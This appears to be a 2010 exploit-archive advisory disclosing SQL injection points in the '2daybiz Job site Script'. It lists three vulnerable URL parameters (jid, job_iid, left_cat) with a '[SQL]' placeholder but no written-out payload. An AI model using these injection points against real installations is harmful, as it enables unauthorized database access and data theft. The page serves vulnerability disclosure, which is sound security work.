2daybiz Job site Script SQL injection

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : 2daybiz Job site Script SQL injection
# Published : 2010-06-24
# Author : Sangteamtham
# Previous Title : ActiveCollab 2.3.0 Local File Inclusion / Directory Traversal
# Next Title : AbleDating script SQL injection Vulnerability

$-------------------------------------------------------------------------------------------------------------------
$ 2daybiz Job site Script SQL injection
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download :http://www.2daybiz.com/realestate_portalscript.html
$ Date :06/24/2010
$
$******************************************************************************************
$Exploit:
$
$ http://server/view_current_job.php?jid=[id number][SQL]
$ http://server/show_search_more.php?job_iid=[id number][SQL]
$ http://server/show_search_result.php?left_cat=[id number][SQL]
$
$******************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for
more security
$
$
$--------------------------------------------------------------------------------------------------------------------